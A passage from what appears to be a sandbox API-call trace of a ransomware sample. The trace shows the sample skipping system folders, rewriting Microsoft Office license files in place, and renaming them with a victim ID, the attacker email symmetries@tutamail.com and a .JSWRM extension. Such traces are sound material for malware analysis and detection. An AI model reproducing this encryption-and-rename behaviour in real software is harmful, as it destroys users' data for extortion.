out: hHeap=0x1e0000) returned 1 [0103.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.700] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentdemor_bypasstrial180-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentDemoR_BypassTrial180-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentdemor_bypasstrial180-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0103.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0103.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0103.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.701] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe46b79f0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe46b79f0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe48a788d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d95, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", cAlternateFileName="HOA685~1.XRM")) returned 1 [0103.701] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.701] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.701] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.701] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.701] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.701] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.701] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.701] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.701] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.701] lstrcmpiW (lpString1="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0103.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0103.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0103.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0103.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0103.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0103.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0103.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0103.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0103.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0103.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0103.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentdemor_bypasstrial180-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.702] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11669) returned 1 [0103.702] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d90) returned 0x24c1d0 [0103.702] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d90, lpOverlapped=0x0) returned 1 [0103.705] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.705] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d90, lpOverlapped=0x0) returned 1 [0103.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.705] CloseHandle (hObject=0x45c) returned 1 [0103.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0103.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0103.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0103.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0103.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0103.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0103.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.706] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentdemor_bypasstrial180-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentdemor_bypasstrial180-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0103.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0103.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0103.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.707] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe451402c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe451402c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe47e8ce2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x542a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_Grace-ppd.xrm-ms", cAlternateFileName="HOC53F~1.XRM")) returned 1 [0103.707] lstrcmpiW (lpString1="HomeStudentR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0103.707] lstrcmpiW (lpString1="HomeStudentR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0103.707] lstrcmpiW (lpString1="HomeStudentR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0103.707] lstrcmpiW (lpString1="HomeStudentR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0103.707] lstrcmpiW (lpString1="HomeStudentR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.707] lstrcmpiW (lpString1="HomeStudentR_Grace-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.707] lstrcmpiW (lpString1="HomeStudentR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.707] lstrcmpiW (lpString1="HomeStudentR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.707] lstrcmpiW (lpString1="HomeStudentR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.707] lstrcmpiW (lpString1="HomeStudentR_Grace-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0103.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Grace-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0103.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0103.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Grace-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2412e0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0103.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0103.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0103.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Grace-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0103.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0103.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Grace-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241218, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0103.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0103.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0103.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0103.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0103.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.709] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21546) returned 1 [0103.709] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5420) returned 0x24c1d0 [0103.709] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5420, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5420, lpOverlapped=0x0) returned 1 [0103.755] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.755] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5420, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5420, lpOverlapped=0x0) returned 1 [0103.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.755] CloseHandle (hObject=0x45c) returned 1 [0103.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0103.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0103.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0103.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0103.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0103.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0103.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.756] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0103.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0103.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0103.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0103.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0103.762] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe43bca74, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe43bca74, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe46ddba0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d63, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_Grace-ul-oob.xrm-ms", cAlternateFileName="HO8736~1.XRM")) returned 1 [0103.762] lstrcmpiW (lpString1="HomeStudentR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.762] lstrcmpiW (lpString1="HomeStudentR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.762] lstrcmpiW (lpString1="HomeStudentR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.762] lstrcmpiW (lpString1="HomeStudentR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.762] lstrcmpiW (lpString1="HomeStudentR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.762] lstrcmpiW (lpString1="HomeStudentR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.762] lstrcmpiW (lpString1="HomeStudentR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.762] lstrcmpiW (lpString1="HomeStudentR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.762] lstrcmpiW (lpString1="HomeStudentR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.762] lstrcmpiW (lpString1="HomeStudentR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0103.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Grace-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Grace-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0103.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0103.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0103.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Grace-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Grace-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0103.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0103.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0103.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0103.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0103.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.763] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11619) returned 1 [0103.763] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0103.764] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0103.767] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.767] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0103.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.767] CloseHandle (hObject=0x45c) returned 1 [0103.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0103.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 